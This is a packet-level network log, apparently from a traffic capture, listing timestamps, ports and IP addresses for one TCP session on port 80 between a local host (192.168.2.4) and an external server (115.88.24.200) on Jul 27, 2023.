Jul 27, 2023 20:18:52.573148966 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573206902 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573227882 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.573260069 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573312998 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573313951 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.573367119 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573420048 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.573426008 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573483944 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573534966 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.573538065 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573591948 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573642969 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573648930 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.573698997 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573749065 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.573755026 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573812962 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573865891 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.573867083 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573921919 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573972940 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.573976994 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.574028969 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.574048996 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.574084044 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.574139118 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.574191093 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.628875017 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.628988981 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.629035950 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.629100084 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.629106045 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.629106998 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.629170895 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.629230022 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.629236937 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.629302979 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.629365921 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.629367113 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.695096970 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.817554951 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817604065 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817624092 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817642927 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817662001 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817679882 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817698956 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817718029 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817735910 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817755938 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817775011 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817802906 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817823887 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817819118 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.817843914 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817863941 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817883015 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817902088 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817922115 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817933083 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.817933083 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.817934036 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.817941904 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817962885 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.817980051 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.817982912 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818002939 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818022013 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818028927 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818042040 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818053007 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818063974 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818084955 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818104029 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818103075 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818123102 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818141937 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818151951 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818170071 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818171978 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818192005 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818209887 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818228960 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818229914 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818248034 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818257093 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818268061 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818289042 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818306923 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818311930 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818326950 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818336010 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818346977 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818367004 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818377972 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818388939 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818412066 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818430901 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818444967 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818449020 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818469048 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818473101 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818489075 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818492889 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818509102 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818543911 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818593025 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818614006 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818631887 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818651915 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818658113 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818670988 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818685055 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818691969 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818711996 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818732023 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818737984 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818761110 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818850040 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818870068 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818902969 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818907976 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.818922997 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.818978071 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819009066 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819042921 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819077015 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819096088 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819104910 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819129944 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819139957 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819165945 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819185019 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819204092 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819212914 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819222927 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819243908 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819271088 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819272041 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819291115 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819338083 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819345951 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819374084 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819395065 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819415092 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819427013 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819434881 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819478989 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819484949 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819520950 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819540977 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819559097 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819582939 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819595098 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819608927 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819645882 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819664955 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819685936 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819701910 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819720984 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819736004 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819742918 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819762945 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819772005 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819782972 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819833040 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819859028 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819880962 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819900036 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819917917 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819936037 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819946051 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819947004 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819957972 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819978952 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.819986105 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.819998026 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820022106 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820039988 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820063114 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820075035 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820087910 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820096016 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820130110 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820149899 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820152998 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820169926 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820189953 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820208073 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820211887 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820211887 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820229053 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820247889 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820298910 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820298910 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820298910 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820319891 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820341110 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820359945 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820363998 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820379972 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820400000 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820419073 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820424080 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820444107 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820463896 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820482969 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820485115 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820485115 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820501089 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820521116 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820525885 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820540905 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820563078 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820583105 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820601940 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820605040 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820605040 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820621014 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820640087 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820640087 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820662022 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820679903 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820698977 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820703983 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820718050 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820736885 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820738077 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820759058 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820776939 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820789099 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820796967 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820816994 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820822001 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820836067 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820847988 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820857048 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820875883 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820880890 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.820895910 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820915937 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820935011 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820954084 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820971966 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.820991039 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821011066 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821029902 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821038961 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821038961 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821043015 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821058035 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821077108 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821094036 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821114063 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821127892 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821134090 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821154118 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821166039 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821175098 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821194887 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821197033 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821217060 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821230888 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821237087 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821257114 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821258068 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821275949 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821295023 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821314096 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821315050 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821335077 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821346045 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821358919 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821378946 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821398973 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821419001 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821438074 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821441889 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821441889 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821458101 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821479082 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821481943 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821499109 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821510077 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821521044 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821540117 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821558952 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821569920 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821578979 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821599007 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821602106 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821619987 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821640015 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821669102 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821688890 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821707010 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821706057 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821707010 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821707010 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821727037 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821747065 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821757078 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821767092 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821787119 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821805000 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821818113 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821824074 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821841002 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821845055 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821865082 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821873903 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821883917 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821903944 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821907043 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821923018 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821943998 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821958065 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.821963072 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.821984053 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.822001934 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.822010040 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.822031021 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.822858095 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.823595047 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.872678995 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872718096 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872736931 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872756004 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872775078 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872793913 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872812986 CEST	80	49686	115.88.24.200	192.168.2.4
